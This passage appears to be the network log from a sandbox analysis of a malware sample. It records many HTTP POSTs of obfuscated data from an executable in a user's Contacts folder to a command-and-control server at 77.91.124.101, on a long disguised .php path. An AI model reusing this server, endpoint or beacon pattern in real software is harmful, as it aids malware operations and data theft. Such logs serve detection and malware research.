                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            7 | 192.168.2.5 | 49719 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:31.019237995 CET | 171 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:31.220777988 CET | 171 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:31.221050024 CET | 173 | OUT | Data Raw: 52 58 58 51 5b 52 5a 58 5d 57 55 57 55 5a 57 55 50 5c 58 44 56 55 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RXXQ[RZX]WUWUZWUP\XDVUW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)=_=(=? ?8'5 1?U*$.S&3>,(6($8.&G''^)7
                                                            Nov 21, 2023 04:47:31.425097942 CET | 174 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:31 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            70 | 192.168.2.5 | 49784 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:12.409848928 CET | 440 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:12.607481956 CET | 440 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:12.607781887 CET | 443 | OUT | Data Raw: 57 5c 58 50 5b 52 5a 51 5d 57 55 57 55 5c 57 5a 50 53 58 41 56 56 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W\XP[RZQ]WUWU\WZPSXAVVW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'])+.?.T?##,'5#1<%0["0!-%(<<,&G''^)/
                                                            Nov 21, 2023 04:48:12.810369015 CET | 443 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:12 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            71 | 192.168.2.5 | 49785 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:13.128065109 CET | 444 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:13.326134920 CET | 444 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:13.326483011 CET | 447 | OUT | Data Raw: 57 5c 5d 5d 5e 5a 5f 59 5d 57 55 57 55 5a 57 51 50 5c 58 46 56 56 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W\]]^Z_Y]WUWUZWQP\XFVVWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X=8)Y(+*T* #.72#>(#)0=' -+=+,&G''^)7
                                                            Nov 21, 2023 04:48:13.528403044 CET | 447 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:13 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            72 | 192.168.2.5 | 49786 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:13.848887920 CET | 448 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:14.051969051 CET | 450 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:14.052304029 CET | 452 | OUT | Data Raw: 52 5b 5d 5e 5e 58 5a 5e 5d 57 55 57 55 57 57 53 50 58 58 43 56 51 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R[]^^XZ^]WUWUWWSPXXCVQWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)+!X<(9*#7/B- :(#P3->R$2W:!<,88&G''^)
                                                            Nov 21, 2023 04:48:14.254933119 CET | 461 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:13 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            73 | 77.91.124.101 | 80 | 192.168.2.5 | 49788 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:14.724189043 CET | 462 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:14.922880888 CET | 462 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:14.923093081 CET | 465 | OUT | Data Raw: 57 5f 58 59 5b 5f 5f 59 5d 57 55 57 55 5d 57 52 50 5e 58 45 56 55 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W_XY[__Y]WUWU]WRP^XEVUW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^*;-Z?;*V=,2#)9_)0*R0"W'9-8*</&G''^)+
                                                            Nov 21, 2023 04:48:15.129034042 CET | 465 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:14 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            74 | 77.91.124.101 | 80 | 192.168.2.5 | 49789 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:16.791912079 CET | 466 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:16.989553928 CET | 466 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:17.181687117 CET | 467 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:16 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 0
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            75 | 192.168.2.5 | 49790 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:17.179908991 CET | 467 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1396
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:17.377446890 CET | 468 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:17.377918959 CET | 470 | OUT | Data Raw: 57 50 58 51 5e 5e 5f 5c 5d 57 55 57 55 5e 57 5b 50 59 58 48 56 56 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WPXQ^^_\]WUWU^W[PYXHVVW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_*=X<(2R=# ;54:Y?3"V'1'%,;?->&G''^)
                                                            Nov 21, 2023 04:48:17.580379963 CET | 473 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:17 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 22 1f 26 3f 23 05 34 33 23 55 3c 3a 32 0b 2e 2e 25 1b 3f 20 29 11 32 3d 28 5f 27 29 3d 50 3c 2f 30 11 30 39 2c 51 37 18 0a 11 2a 20 21 5a 0c 1d 26 15 35 28 23 55 3c 07 3b 03 3c 2d 0e 5c 32 21 01 5c 2b 07 3f 16 34 0d 09 1f 31 0a 3b 0b 2f 59 21 5f 3a 01 2e 44 27 2c 31 01 34 17 23 5f 0c 14 27 18 35 0f 20 02 22 30 29 09 23 37 1a 14 23 37 27 1f 30 3d 0d 0e 26 5e 21 14 3c 38 38 52 31 09 06 51 27 29 2b 1d 31 00 23 13 3c 00 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: "&?#43#U<:2..%? )2=(_')=P</009,Q7* !Z&5(#U<;<-\2!\+?41;/Y!_:.D',14#_'5 "0)#7#7'0=&^!<88R1Q')+1#<&T*+H6ZP


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            76 | 77.91.124.101 | 80 | 192.168.2.5 | 49791 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:17.300045013 CET | 468 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:17.496331930 CET | 470 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:17.531966925 CET | 472 | OUT | Data Raw: 52 58 58 5c 5e 5e 5f 5d 5d 57 55 57 55 59 57 5a 50 58 58 45 56 51 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RXX\^^_]]WUWUYWZPXXEVQWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*;=+;.>8,'67:2(3&>-&#=,;<,8&G''^)
                                                            Nov 21, 2023 04:48:17.733270884 CET | 473 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:17 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            77 | 77.91.124.101 | 80 | 192.168.2.5 | 49792 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:18.050329924 CET | 474 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:18.251388073 CET | 474 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:18.251651049 CET | 477 | OUT | Data Raw: 52 5c 58 58 5b 5c 5f 5e 5d 57 55 57 55 59 57 50 50 5b 58 48 56 55 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R\XX[\_^]WUWUYWPP[XHVUW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'\)^"(+>*?;76Z#)?R'-.Q' V->X<?+\,&G''^)
                                                            Nov 21, 2023 04:48:18.462958097 CET | 477 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:18 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            77192.168.2.54979277.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:18.050329924 CET474OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:18.251388073 CET474INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:18.251651049 CET477OUTData Raw: 52 5c 58 58 5b 5c 5f 5e 5d 57 55 57 55 59 57 50 50 5b 58 48 56 55 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R\XX[\_^]WUWUYWPP[XHVUW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'\)^"(+>*?;76Z#)?R'-.Q' V->X<?+\,&G''^)
                                                            Nov 21, 2023 04:48:18.462958097 CET | 477 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:18 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            78 | 77.91.124.101 | 80 | 192.168.2.5 | 49793 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:18.790292025 CET | 478 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:18.986663103 CET | 478 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:18.986892939 CET | 480 | OUT | Data Raw: 57 5c 58 50 5b 59 5f 5d 5d 57 55 57 55 56 57 5b 50 5f 58 41 56 57 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W\XP[Y_]]WUWUVW[P_XAVWWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^=81^<+*V)3<8&Z#=+50=.$0&R9+]?,;Y/&G''^)
                                                            Nov 21, 2023 04:48:19.188397884 CET | 481 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:18 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            79 | 192.168.2.5 | 49794 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:19.503804922 CET | 482 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:19.702590942 CET | 482 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:19.702955961 CET | 484 | OUT | Data Raw: 57 5a 5d 5c 5b 5e 5a 5a 5d 57 55 57 55 57 57 57 50 5c 58 41 56 5e 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WZ]\[^ZZ]WUWUWWWP\XAV^WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_*%^(+*',42#!_(0>P'-)'#99(*\?;/&G''^)
                                                            Nov 21, 2023 04:48:19.906702995 CET | 485 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:19 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            8 | 192.168.2.5 | 49720 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:31.758867979 CET | 175 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:31.958381891 CET | 175 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:31.958623886 CET | 177 | OUT | Data Raw: 52 5f 58 59 5b 5c 5a 5d 5d 57 55 57 55 5f 57 55 50 53 58 49 56 53 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_XY[\Z]]WUWU_WUPSXIVSW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=!X?9=#+.47&('=$ -,;-?<X;>&G''^)#
                                                            Nov 21, 2023 04:47:32.168170929 CET | 178 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:31 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
